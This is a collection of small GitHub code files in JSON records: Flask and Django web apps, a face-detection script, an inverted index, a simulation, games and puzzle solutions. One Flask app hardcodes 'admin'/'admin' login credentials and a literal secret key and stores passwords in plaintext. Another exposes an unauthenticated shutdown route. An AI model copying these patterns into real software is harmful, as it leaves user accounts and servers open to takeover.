path('SavedCards/', SavedCardsView0),\n path('cards//', SingleCardView0),\n path('create/', CreateCard0),\n path('Privacy/', PrivacyView),\n path('Cookies/', CookiesView),\n path('ToC/', ToCView),\n path('About/', AboutView),\n path('ContactUs/', ContactUsView),\n path('', include(\"django.contrib.auth.urls\"),),\n path('Register/', RegisterView0),\n path('sitemap.xml/', SitemapView),\n path('AllCards/',AllCards)\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"BlankuApp/BlankuApp","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71831086026","text":"from flask import Flask,request,jsonify,make_response,render_template,session,redirect\nfrom secrets import token_hex\n\nimport datetime\nimport function\napp = Flask(__name__)\napp.secret_key = token_hex(24)\n\n\n@app.route('/')\ndef hello():\n \"\"\"Return a friendly HTTP greeting.\"\"\"\n return \"basic server load success\"\n\n@app.route('/demo')\ndef demo():\n clientID = request.cookies.get('username')\n if clientID is None:\n resp = make_response(render_template('index.html'))\n resp.set_cookie('username', token_hex(16), expires=datetime.datetime.now() + datetime.timedelta(days=30))\n else:\n resp = make_response(render_template('index.html'))\n session['clientID'] = clientID\n session.permanent = False\n return resp\n\n@app.route('/demo_result')\ndef demo_result():\n sessionID = token_hex(12)\n math = request.args.get('math', default='*', type=float)\n science = request.args.get('science', default='*', type=float)\n english = request.args.get('english', default='*', type=float)\n MT = request.args.get('MT', default='*', type=float)\n pc = request.args.get('pc', default='*', type=str)\n email = request.args.get('email', default='*', type=str)\n school = request.args.get('school', default='*', type=str)\n grade = request.args.get('grade', default='*', type=str)\n gender = request.args.get('gender', default='*', type=str)\n term = request.args.get('term', default='*', type=str)\n DB_status = function.get_status()\n clientID = session.get('clientID', None)\n user_status = function.input_user(pc,email,school,grade,sessionID,clientID,gender)\n user_score=function.input_score(math,science,english,grade,sessionID,MT,term)\n Tscore=function.cal_T(sessionID)\n session['user_status'] = user_status\n session['user_score'] = user_score\n session['DB_status'] = DB_status\n session['T_Score'] = Tscore\n\n return redirect(\"/demo_display\", code=302)\n\n@app.route('/demo_display')\ndef demo_display():\n string =\"\"\"\n Run with below result:
\n 1) DB Status: \"\"\" + str(session['DB_status'])+ \"\"\"
\n 2) Create User Status: \"\"\"+ session['user_status']+ \"\"\"
\n 3) Upload Score Status: \"\"\"+ session['user_score']+ \"\"\"
\n 4) T Score Status: \"\"\"+ session['T_Score']+ \"\"\"


\n \n Demo Complete!\n \n\"\"\"\n return string\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'STATUS': 'Not found'}), 404)\n\ndef shutdown_server():\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n\n@app.route('/shutdown', methods=['GET'])\ndef shutdown():\n shutdown_server()\n return 'Server shutting down...'\n\n\nif __name__ == '__main__':\n # This is used when running locally only. When deploying to Google App\n # Engine, a webserver process such as Gunicorn will serve the app. This\n # can be configured by adding an `entrypoint` to app.yaml.\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python37_app]\n","repo_name":"GZR5876/PSLE_FE","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37284055844","text":"from flask import Flask, render_template, request, redirect, url_for, send_from_directory, flash\r\nimport os\r\nimport sys\r\nfrom pymongo import MongoClient\r\nfrom analyser import review_analyser \r\nfrom datetime import datetime\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nimport keras as kr\r\nimport sklearn\r\nimport math\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation, LSTM\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\nimport itertools\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\ndata = pd.read_csv('data1.csv')\r\n\r\ndata.set_index('Date', inplace = True)\r\ndata1 = data.transpose()\r\ndates = pd.date_range(start = '2019-03-15', freq = 'D', periods = len(data1.columns)*1)\r\ndata_np = data1.transpose().as_matrix()\r\nshape = data_np.shape\r\ndata_np = data_np.reshape((shape[0] * shape[1], 1))\r\ndf = pd.DataFrame({'Mean' : data_np[:,0]})\r\ndf.set_index(dates, inplace = True)\r\n\r\nplt.figure(figsize = (15,5))\r\nplt.plot(df.index, df['Mean'])\r\nplt.title('daily Mean')\r\nplt.xlabel('Date')\r\nplt.ylabel('Mean across Day')\r\nplt.savefig('static/graph.png')\r\n\r\ndataset = df.values\r\ntrain = dataset[0:15,:]\r\ntest = dataset[15:,:]\r\nprint(\"Original data shape:\",dataset.shape)\r\nprint(\"Train shape:\",train.shape)\r\nprint(\"Test shape:\",test.shape)\r\n\r\n# Converting the data into MinMax Scaler because to avoid any outliers present in our dataset\r\nscaler = MinMaxScaler(feature_range = (0,1))\r\nscaled_data = scaler.fit_transform(dataset)\r\nscaled_data.shape\r\n\r\n\r\nx_train, y_train = [], []\r\nfor i in range(5,len(train)):\r\n x_train.append(scaled_data[i-5:i,0])\r\n y_train.append(scaled_data[i,0])\r\nx_train, y_train = np.array(x_train), np.array(y_train)\r\n\r\nx_train = np.reshape(x_train, (x_train.shape[0],x_train.shape[1],1))\r\n\r\n # Creating and fitting the model\r\n\r\nmodel = Sequential()\r\nmodel.add(LSTM(units = 6, return_sequences = True, input_shape = (x_train.shape[1],1)))\r\nmodel.add(LSTM(units = 6))\r\nmodel.add(Dense(1))\r\n\r\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adam')\r\nmodel.fit(x_train, y_train, epochs=10, batch_size = 1, verbose = 2)\r\n# Now Let's perform same operations that are done on train set\r\ninputs = df[len(df) - len(test) - 5:].values\r\ninputs = inputs.reshape(-1,1)\r\ninputs = scaler.transform(inputs)\r\n\r\nX_test = []\r\nfor i in range(5,inputs.shape[0]):\r\n X_test.append(inputs[i-5:i,0])\r\nX_test = np.array(X_test)\r\n\r\nX_test = np.reshape(X_test, (X_test.shape[0],X_test.shape[1],1))\r\nMean = model.predict(X_test)\r\nMean1 = scaler.inverse_transform(Mean)\r\n#plotting the train, test and forecast data\r\ntrain = df[:15]\r\ntest = df[15:]\r\ntest['Predictions'] = Mean1\r\ntrainpred = model.predict(X_test,steps=2)\r\n#x_train shape\r\nx_train.shape\r\npred = scaler.inverse_transform(trainpred)\r\npred[0:24] \r\ntestScore = math.sqrt(mean_squared_error(test['Mean'], trainpred[:6,0]))*100\r\nprint('Accuracy Score: %.2f' % (testScore))\r\n\r\ndates1 = pd.date_range(start = '2019-03-30', freq = 'D', end = '2019-04-10')\r\n\r\nnew_df = pd.DataFrame({'Predicted_values':pred[:,0]})\r\n\r\nnew_df.set_index(dates1, inplace = True)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncurrentDT = datetime.now()\r\n\r\n\r\ntime = currentDT.strftime(\"%I:%M:%S %p\")\r\n\r\napp = Flask(__name__)\r\ndate=currentDT.strftime(\"%Y-%m-%d\")\r\n#date=datetime.now().today()\r\n#time=datetime.now().time()\r\nconnection = MongoClient(\"localhost\", 27017)\r\ndb = connection.mydatabase \r\nmla=db.mla\r\nmp=db.mp\r\nuser=db.user\r\nmeetings=db.meetings\r\ncomments1=db.usercomments\r\napp.secret_key = 'super'\r\n@app.route('/')\r\ndef index():\r\n return render_template('login_form.html')\r\n\r\n@app.route('/login', methods=['GET','POST'])\r\ndef login():\r\n\tif request.method == 'POST':\r\n\t\tun = str(request.form['UserName'])\r\n\t\tp = str(request.form['Password'])\r\n\t\tradio=str(request.form['contact'])\r\n\t\tif radio == \"admin\":\r\n\t\t\tif un==\"admin\" and p==\"admin\":\r\n\t\t\t\tadu=[]\r\n\t\t\t\tadml=[]\r\n\t\t\t\tadmp=[]\r\n\t\t\t\tfor i in user.find():\r\n\t\t\t\t\tadu.append(i)\r\n\t\t\t\tfor j in mla.find():\r\n\t\t\t\t\tif j['designation'] == 'mla':\r\n\t\t\t\t\t\tadml.append(j)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tadmp.append(j)\r\n\t\t\t\tli=[]\r\n\t\t\t\t\r\n\t\t\t\t#paste here val\r\n\t\t\t\tif comments1.count() == 0 :\r\n\t\t\t\t\tstars = 0\r\n\t\t\t\telse :\r\n\t\t\t\t\tavg=0\r\n\t\t\t\t\tb=0\r\n\t\t\t\t\tfor rev in comments1.find():\r\n\t\t\t\t\t\tavg = avg + rev['rating']\r\n\t\t\t\t\t\tb = b + 1\r\n\t\t\t\t\tstars = avg / b\r\n\t\t\t\tval = stars\r\n\t\t\t\tcomments = \tcomments1.find()\t\r\n\t\t\t\tflash(comments)\t\r\n\t\t\t\treturn render_template(\"home.html\", user1=adu, mla=adml, mp=admp, val = val, ss=new_df.to_html())\r\n\t\t\telse:\r\n\t\t\t\treturn render_template('login_form.html', data=\"authentication failed\")\r\n\t\telif radio == \"mla\":\r\n\t\t\tfor i in mla.find():\r\n\t\t\t\tif i['designation'] == 'mla':\r\n\t\t\t\t\tif un==i[\"username\"] and p==i[\"password\"]:\r\n\t\t\t\t\t\tml=[]\r\n\t\t\t\t\t\tfor i in user.find():\r\n\t\t\t\t\t\t\tml.append(i)\r\n\t\t\t\t\t\treturn render_template(\"mla.html\", ml=ml)\r\n\t\t\t\t\t\r\n\t\t\treturn render_template('login_form.html', data=\"authentication failed to mla\")\r\n\t\telif radio == \"mp\":\r\n\t\t\tfor i in mla.find():\r\n\t\t\t\tif i['designation'] == 'mp':\r\n\t\t\t\t\tif un==i[\"username\"] and p==i[\"password\"]:\r\n\t\t\t\t\t\tml=[]\r\n\t\t\t\t\t\tfor i in user.find():\r\n\t\t\t\t\t\t\tml.append(i)\r\n\t\t\t\t\t\treturn render_template(\"mp.html\")\r\n\t\t\t\t\r\n\t\t\treturn render_template('login_form.html', data=\"authentication failed to mp\")\r\n\t\telif radio == \"user\":\r\n\t\t\tfor i in user.find():\r\n\t\t\t\tmet=[]\r\n\t\t\t\tif un==i[\"UserName\"] and p==i[\"Password\"]:\r\n\t\t\t\t\tfor i in meetings.find():\r\n\t\t\t\t\t\tmet.append(i)\r\n\t\t\t\t\treturn render_template(\"user.html\", ll=met)\r\n\t\t\t\t\r\n\t\t\treturn render_template('login_form.html', data=\"authentication failed\")\r\n\t\telse:\r\n\t\t\treturn render_template('login_form.html', data=\"select raido button\")\r\n\telse:\r\n\t\treturn render_template(\"login_form.html\")\r\n@app.route('/mlampreg', methods=['GET','POST'])\r\ndef mlampreg():\r\n\tif request.method == 'POST':\r\n\t\tradio=str(request.form['contact1'])\r\n\t\tfirstName=str(request.form['First_Name'])\r\n\t\tlastName=str(request.form['Last_Name'])\r\n\t\tdob=str(request.form.get('Birthday_day'))+\"/\"+str(request.form.get('Birthday_Month'))+\"/\"+str(request.form.get('Birthday_Year'))\r\n\t\temail=str(request.form['Email_Id'])\r\n\t\tphno=str(request.form['Mobile_Number'])\r\n\t\tGender=str(request.form['Gender'])\r\n\t\tusername=str(request.form['username'])\r\n\t\tpassword=str(request.form['password'])\r\n\t\taddress=str(request.form['Address'])\r\n\t\tconsistency=str(request.form['consistency'])\r\n\t\tcity=str(request.form['City'])\r\n\t\tpincode=str(request.form['Pin_Code'])\r\n\t\tstate=str(request.form['State'])\r\n\t\tcountry=str(request.form['Country'])\r\n\t\tmladata={\"designation\":radio, \"firstName\":firstName,\"lastName\":lastName,\"dob\":dob,\"email\":email,\"phno\":phno,\"Gender\":Gender,\"username\":username,\"password\":password,\"address\":address,\"consistency\":consistency,\"city\":city,\"pincode\":pincode,\"state\":state,\"country\":country}\r\n\t\tmla.insert_one(mladata)\r\n\t\treturn render_template('mlampreg.html', da=\"sucess\")\r\n\telse:\r\n\t\treturn render_template('mlampreg.html')\r\n\r\n@app.route('/register', methods=['GET','POST'])\r\ndef register():\r\n\tif request.method == 'POST':\r\n\t\tun = request.form['UserName']\r\n\t\tfn = request.form['FirstName']\r\n\t\tln = request.form['LastName']\r\n\t\td = request.form['Date']\r\n\t\tg = request.form['Gmail']\r\n\t\tp = request.form['Password']\r\n\t\tcp = request.form['ConfirmPassword']\r\n\t\tm = request.form['MobileNumber']\r\n\t\tr = request.form['gridRadios']\r\n\t\ta = request.form['Address']\r\n\t\tcs = request.form['Consistency']\r\n\t\tc = request.form['City']\r\n\t\tpc = request.form['Pincode']\r\n\t\tst = request.form['State']\r\n\t\tct = request.form['Country']\r\n\t\t\r\n\t\tuserdata = {'date':date, 'time':time ,'UserName': un, 'FirstName': fn, 'LastName':ln, 'Date':d, 'Gmail':g, 'Password': cp, 'Gender': r, 'Address':a, 'Consistency':cs, 'City':c, 'Pincode':pc, \r\n\t\t'State':st, 'Country':ct}\r\n\t\tuser.insert_one(userdata)\r\n\t\treturn redirect('login')\r\n\treturn render_template('Registration_form.html')\r\n\r\n@app.route('/meetingdetails', methods=['GET','POST'])\r\ndef meetingdetails():\r\n\tif request.method == 'POST':\r\n\t\tplace=request.form['place']\r\n\t\tdate=request.form['date']\r\n\t\ttime=request.form['time']\r\n\t\tpurpose=request.form['purpose']\r\n\t\tmeetingdetails1={'place':place, 'date':date, 'time':time, 'purpose':purpose}\r\n\t\tmeetings.insert_one(meetingdetails1)\r\n\t\treturn render_template('meetingdetails.html', data='sucess')\r\n\telse:\r\n\t\treturn render_template('meetingdetails.html')\r\n\t\r\n\r\n@app.route('/meets', methods=['GET','POST'])\r\ndef meets():\r\n\tls=[]\r\n\tfor i in meetings.find():\r\n\t\tls.append(i)\r\n\tif request.method == 'POST':\r\n\t\tcomment=request.form['comment']\r\n\t\ta,b,c=review_analyser(comment)\r\n\t\t\r\n\t\tcomments1.insert_one({\"comment\":comment,\"rating\":a,\"star\":b,\"category\":c})\r\n\r\n\t\treturn render_template('meatings.html', meetings1=ls)\r\n\telse:\r\n\t\treturn render_template('meatings.html', meetings1=ls)\r\n\r\n\r\n@app.route('/logout', methods=['GET','POST'])\r\ndef logout():\r\n\treturn render_template('login_form.html')\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)","repo_name":"Cloudindojo/Machine_learning","sub_path":"party/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38287170384","text":"import sys\nfrom collections import deque\n\nN, M = map(int, sys.stdin.readline().split())\n\nGRID = [list(sys.stdin.readline().strip()) for _ in range(M)]\n\ndx = [1, 0, -1, 0]\ndy = [0, -1, 0, 1]\n\n\ndef bfs(y, x, C):\n to_visit = deque([(y, x)])\n GRID[y][x] = \"K\"\n\n cnt = 0\n\n while to_visit:\n Y, X = to_visit.popleft()\n cnt += 1\n for d in range(4):\n next_Y, next_X = Y + dy[d], X + dx[d]\n if 0 <= next_Y < M and 0 <= next_X < N:\n if not GRID[next_Y][next_X] == \"K\" and GRID[next_Y][next_X] == C:\n GRID[next_Y][next_X] = True\n to_visit.append((next_Y, next_X))\n return cnt**2\n\n\nW = 0\nfor y in range(M):\n for x in range(N):\n if GRID[y][x] == \"W\":\n W += bfs(y, x, \"W\")\n\nB = 0\nfor y in range(M):\n for x in range(N):\n if GRID[y][x] == \"B\":\n B += bfs(y, x, \"B\")\n\nprint(W, B)\n","repo_name":"shiueo/PS","sub_path":"1303.py","file_name":"1303.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6956444484","text":"# Face Detection is performed using classifiers. \n# A classifier is an algorithm that decides whether a given image is positive or negative if a face is present or not. \n# It needs to be trained on 1.000 and 10.000 of images with and without faces. OpenCV comes with pre trained classifiers.\n# Haar Cascade (basic) - https://github.com/opencv/opencv/tree/master/data/haarcascades\n\nimport cv2 as cv\n\nimg = cv.imread('./Faces/faces_0.jpeg')\n\ndesired_height = 700\naspect_ratio = desired_height/img.shape[0]\ndesired_width = int(img.shape[1]*aspect_ratio)\ndim = (desired_width, desired_height)\nimg = cv.resize(img, dsize=dim, interpolation=cv.INTER_AREA)\ncv.imshow('Faces', img)\n\n# Face detection does not involve skin tone or colors present in the image. Haar cascades look at an object in an image and using the edges tries to determine whether it's a face or not. \n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('Gray Image', gray)\n\nhaar_cascade = cv.CascadeClassifier('haar_face.xml')\n\nfaces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=3)\n\nprint(f'Number of faces found = {len(faces_rect)}')\n\nfor (x,y,w,h) in faces_rect:\n cv.rectangle(img, (x,y), (x+w, y+h), (0,255,0), thickness=2)\n\ncv.imshow('Detected Faces', img)\n\n\ncv.waitKey(0)","repo_name":"Mikheltodd/Intro_to_OpenCV","sub_path":"face_recognition/1_face_detection.py","file_name":"1_face_detection.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5586322405","text":"from django.db.models import Manager as GeoManager\nfrom django.contrib.gis.db import models\nfrom django.utils import timezone\n\n\nclass Region(models.Model):\n name = models.TextField('Region name')\n geom = models.MultiPolygonField(blank=True, null=True)\n x_min = models.FloatField(blank=True, null=True)\n x_max = models.FloatField(blank=True, null=True)\n y_min = models.FloatField(blank=True, null=True)\n y_max = models.FloatField(blank=True, null=True)\n slug = models.TextField('Region slug',blank=True, null=True)\n\n objects = GeoManager()\n\n def __str__(self):\n return self.name\n\n class Meta:\n managed = True\n ordering = ['name']\n verbose_name = \"region\"\n verbose_name_plural = \"regions\"\n\n\nclass LoadEvent(models.Model):\n event_start = models.DateTimeField(default=timezone.now)\n event_finish = models.DateTimeField(null=True, blank=True)\n origin = models.TextField('Source of the original observation', null=True, blank=True)\n data_chunks = models.TextField('List of succesully created local pages', null=True, blank=True)\n n_records_origin = models.IntegerField('Number of records to download', null=True, blank=True)\n n_records_pulled = models.IntegerField('Number of records to download', null=True, blank=True)\n url_used = models.TextField('List of succesully created local pages', null=True, blank=True)\n\n class Meta:\n verbose_name = \"loadevent\"\n verbose_name_plural = \"loadevents\"\n\n\nclass Observation(models.Model):\n species_guess = models.TextField('Guessed species',null=True, blank=True)\n species_id = models.TextField('Species identified',null=True, blank=True)\n original_url = models.URLField('Original url of the observation, if available',null=True,blank=True)\n picture_url = models.URLField('Observation picture',null=True,blank=True)\n observation_time_string = models.CharField('Observation date in string format', max_length=500, null=True, blank=True)\n observation_time = models.DateTimeField('Observation datetime',null=True,blank=True)\n observation_date = models.DateField('Observation date year month day', null=True, blank=True)\n observation_updated_at = models.DateTimeField('Observation last update', null=True, blank=True)\n record_creation_time = models.DateTimeField(auto_now_add=True)\n origin = models.TextField('Source of the original observation',null=True, blank=True)\n location = models.PointField(blank=True, null=True, srid=4326)\n native_id = models.TextField('Id of the observation in its native app',null=True, blank=True)\n load_event = models.ForeignKey(LoadEvent, on_delete=models.CASCADE, null=True)\n region = models.ForeignKey(Region, blank=True, null=True, on_delete=models.CASCADE, )\n iconic_taxon_id = models.IntegerField(blank=True, null=True)\n iconic_taxon_name = models.TextField(blank=True, null=True)\n author = models.TextField(blank=True, null=True)\n objects = GeoManager()\n\n def __str__(self):\n return self.species_id\n\n class Meta:\n verbose_name = \"observation\"\n verbose_name_plural = \"observations\"\n ordering = ('species_id',)\n\n\nclass DataProject(models.Model):\n name = models.TextField('Project name')\n slug = models.TextField('Shortened project name', blank=True, null=True)\n url = models.URLField('Project url if available', blank=True, null=True)\n\n\nclass Stats(models.Model):\n region = models.ForeignKey(Region, blank=True, null=True, on_delete=models.CASCADE, )\n project = models.ForeignKey(DataProject, on_delete=models.CASCADE, )\n n_observations = models.IntegerField(default=0)\n last_updated = models.DateTimeField(auto_now=True)\n","repo_name":"aescobarr/data_aggregator_api","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70863960584","text":"import pandas as pandas;\nimport json\nfrom collections import defaultdict\nfrom Common import lemmatize_text\n\n\nindex_filename = 'search_indexs.json';\ncsv_filename = 'data.csv'\n\n#should be called after new data is arrived\ndef get_df():\n return pandas.read_csv(csv_filename);\n\ndef get_data_size():\n df = pandas.read_csv(csv_filename);\n return df.size;\n\n\ndef add_index_col(df):\n if 'id' not in df.columns:\n df.insert(0, 'id', df.reset_index().index)\n df.to_csv(csv_filename, index=False);\n return df;\n\ndef process_word(df):\n \n df['title'] = df['title'].apply(lambda x: lemmatize_text(x));\n df['all_authors'] = df['all_authors'].apply(lambda x: lemmatize_text(x));\n \n return df;\n\ndef create_indexes(df):\n word_dict = defaultdict(list);\n for index, row in df.iterrows():\n title = row['title'];\n authors = row['all_authors'];\n words = title.split() + authors.split();\n for word in words:\n word_dict[word].append(index)\n return word_dict;\n\n\n#utilized everything on this file\ndef create_save_indexes():\n try: \n df = add_index_col(get_df());\n print(\"Processing words.\");\n df = process_word(df);\n \n print(\"Creating Indexes.\");\n indexes = create_indexes(df);\n\n print(\"Indexing finished successfully.\");\n #save indexes\n with open(index_filename, 'w') as new_f:\n json.dump(indexes, new_f, sort_keys=True, indent=4)\n \n return True;\n except Exception as e:\n print(f\"An error occurred on indexing: {str(e)}\")\n return False;\n\n\n#called from subproess\ncreate_save_indexes();\n\n#single_value = df.loc[0:1].copy();\n","repo_name":"Suraj6E/IRA-search-engine","sub_path":"InvertedIndex.py","file_name":"InvertedIndex.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6061661714","text":"import random\nimport operator\nimport matplotlib.pyplot\nimport agentframework\nimport csv\nimport numpy\nimport matplotlib.animation # import animation from matplotlib package.\n\nnum_of_agents = 10 # Make a num_of_agents variable and assign it to 10\nnum_of_iterations = 100 # Make a num_of_iterations variable and assign it to 100\nneighbourhood = 20 # Make a neighbourhood variable and assign it to 20\nagents = [] # Creat agents list.\nenvironment = [] # Creat environment list.\n\n# Make animation properties.\nfig = matplotlib.pyplot.figure(figsize=(6, 6)) # Set up the figure and the plot size.\nax = fig.add_axes([0, 0, 1, 1]) # Add axis list in the figure.\n\n#frames, = ax.plot(x, y)\n\n# To load in.txt file.\nwith open(\"in.txt\") as f:\n data = f.read().splitlines() \n# The downloaded text format is not standard, so needs to change.\n for row in data:\n rowlist = []\n for value in row.split(','):\n if value[-1] == '\\\\':\n value1 = value[0:(len(value)-1)]\n rowlist.append(int(value1))\n else:\n rowlist.append(int(value))\n environment.append(rowlist)\n\nfor line in agents:\n f.write(line)\n#f.close()\n\n\n# # Make the agents by putting into a for-loop.\nfor i in range(num_of_agents):\n agents.append(agentframework.Agent(environment, agents, neighbourhood))\n matplotlib.pyplot.scatter(agents[i].x,agents[i].y) # Make scatter plot.\n \n#matplotlib.pyplot.show()\n\n# Start condition.\ncarry_on = True \n\n# Update data points.\ndef update(frame_number): # Sets the number of animation frames\n fig.clear() # Clear a figure.\n global carry_on # carry_on is a global variable\n \n # Move the agents by putting into nest for-loops.\n for j in range(num_of_iterations):\n for i in range(num_of_agents):\n agents[i].move(\"frame_number\")\n agents[i].eat()\n agents[i].share_with_neighbours()\n \n \"\"\"\n # Set stopping condition.\n if random.random() < 0.1:\n carry_on = False\n print(\"stopping condition\")\n \"\"\"\n \n # Set properties and show the animation plot.\n matplotlib.pyplot.xlim(0, 100) # Set the x-axis range from 0 to 100.\n matplotlib.pyplot.ylim(0, 100) # Set the y-axis range from 0 to 100.\n matplotlib.pyplot.imshow(environment) # Display an image on the axes.\n matplotlib.pyplot.title(label = \"Scatter Plot Animation\") # Set plot title.\n \n # Displays the random points obtained with the for-loop.\n for i in range(num_of_agents):\n matplotlib.pyplot.scatter(agents[i].x,agents[i].y)\n matplotlib.pyplot.show() \n \n# Define a generator function.\ndef gen_function(b = [0]):\n a = 0\n global carry_on # Display clearly, even if it is not assigned.\n while (a < num_of_agents) & (carry_on) : # While-loop.\n yield a\t\t\t# Returns control and waits next call.\n a = a + 1\n\n# Use for-each loop iterator to put out agents. \nfor self in agents:\n for agent in agents:\n agentframework.Agent.distance_between(self, agent) # Calling the method from agentframework.py.\n\n# Make the animation stopping condition.\nanimation = matplotlib.animation.FuncAnimation(fig, update,frames=gen_function, repeat=False)\n\n# Show the plot animation. \nmatplotlib.pyplot.show()\n\n# Save .gif file.\nanimation = matplotlib.animation.save('test_animation.gif',writer='imagemagick')\n\n\n\n\n","repo_name":"hahatori/Animation","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30843897177","text":"#This is the game controller that orchestrates the gae\n\nfrom tic_tac_toe import Game, Player, Score\n\nplayer1 = None\nplayer2 = None\ngame = None\nplayer_marker=None\nplayer_name=None\nscore = None\n#this function runs after one game is done. \ndef game_prompt():\n while(True):\n print('Do you want to play a new game?(yes or no)')\n y_or_n=input()\n if y_or_n.lower().startswith('y'):\n print('new game starting')\n print()\n break\n else:\n print(\"ok, game ending\")\n exit()\n \n\n#While true loop, pools the game until they say stop\nwhile True:\n #get players\n if player1 == None or player2 == None:\n print(\"Welcome to Pragyan's Tic Tok Toe!!!\")\n print()\n print(\"what is the first person's name?\")\n person1= input()\n print(\"what is the second person's name?\")\n person2= input()\n player1 = Player(person1,\"X\")\n player2 = Player(person2,\"O\")\n score = Score(player1, player2)\n\n if game == None:\n game = Game()\n \n if len(game.board_index) > 0: \n if(len(game.board_index)%2==0):\n player_marker=player2.marker\n player_name=player2.name\n else:\n player_marker=player1.marker\n player_name=player1.name\n\n game.printboard()\n print(player_name+', where would you like to put '+player_marker+'? For example, 0,0')\n placement = input()\n game.update_board(placement, player_marker)\n print()\n \n if len(game.board_index) < 5:\n winning_marker = game.check()\n if winning_marker != None:\n winner_name = \"\"\n if winning_marker == player1.marker:\n winner_name = player1.name \n else:\n winner_name = player2.name\n print (\"The winner is: {}\".format(winner_name))\n score.update_score(winner_name)\n score.print_score()\n \n game= Game()\n game_prompt()\n continue\n \n if len(game.board_index) == 0:\n print('It is a Draw!')\n game = Game()\n game_prompt()\n\n","repo_name":"PragyanR/byu-tic-tac-toe","sub_path":"game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41695427194","text":"#!/usr/bin/python3\n\"\"\"\nYou are standing at position 0 on an infinite number line. There is a goal at\nposition target.\n\nOn each move, you can either go left or right. During the n-th move (starting\nfrom 1), you take n steps.\n\nReturn the minimum number of steps required to reach the destination.\n\nExample 1:\nInput: target = 3\nOutput: 2\nExplanation:\nOn the first move we step from 0 to 1.\nOn the second step we step from 1 to 3.\nExample 2:\nInput: target = 2\nOutput: 3\nExplanation:\nOn the first move we step from 0 to 1.\nOn the second move we step from 1 to -1.\nOn the third move we step from -1 to 2.\nNote:\ntarget will be a non-zero integer in the range [-10^9, 10^9].\n\"\"\"\n\n\nclass Solution:\n def reachNumber(self, target: int) -> int:\n \"\"\"\n math\n\n put -/+ for 1, 2, 3, 4, ..., k\n flip a sign change in even number\n\n if target negative, flip the sign. Thus, we can only consider positive\n number\n \"\"\"\n target = abs(target)\n s = 0\n k = 0\n while s < target:\n k += 1\n s += k\n\n delta = s - target\n if delta % 2 == 0:\n return k\n else: # delta is odd\n if (k + 1) % 2 == 1:\n return k + 1\n else:\n return k + 2\n","repo_name":"algorhythms/LeetCode","sub_path":"754 Reach a Number.py","file_name":"754 Reach a Number.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":843,"dataset":"github-code","pt":"81"} +{"seq_id":"42116882946","text":"from tree import TreeNode \nfrom breath_first_search import bfs\nfrom bfs import breathfirtsearch\nfrom depth_first_search import dfs\n\n\nroot_node = TreeNode(\"Desktop\")\nwork_folder = TreeNode(\"Work\")\nschool_folder = TreeNode(\"School\")\nproject_folder = TreeNode(\"Project\")\n\nroot_node.children = [work_folder, school_folder, project_folder]\nmy_wish = TreeNode(\"WishList.txt\")\nmy_todo = TreeNode(\"TodoList.txt\")\nmy_cat = TreeNode(\"Fluffy.jpg\")\nmy_dog = TreeNode(\"Spot.jpg\")\nmy_horse = TreeNode(\"Horse.jpg\")\nmy_work = TreeNode(\"Work.jpg\")\n\nwork_folder.children = [my_todo, my_work]\nschool_folder.children = [my_cat, my_horse]\nproject_folder.children = [my_dog, my_wish]\n\nfinding_path = bfs(root_node, \"Work.jpg\")\nfinding_path_dfs = bfs(root_node, \"Work.jpg\")\n\nif finding_path is None:\n print(\"Path not found\")\nelse:\n print(\"Path found using BFS\")\n for path in finding_path:\n print(path.value)\n\nif finding_path is not None:\n print(\"Path found using DFS\")\n for path in finding_path_dfs:\n print(path.value)\nelse:\n print(\"No path found\")","repo_name":"nidup1010/algorithms-and-data-structures","sub_path":"trees/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30781779863","text":"from werkzeug.exceptions import Forbidden, NotFound\n\nfrom odoo.addons.component.core import Component\n\n\nclass GuestService(Component):\n _name = \"shopinvader.guest.service\"\n _inherit = \"shopinvader.customer.service\"\n _usage = \"guest\"\n\n # The following method are 'public' and can be called from the controller.\n def create(self, **params):\n if not 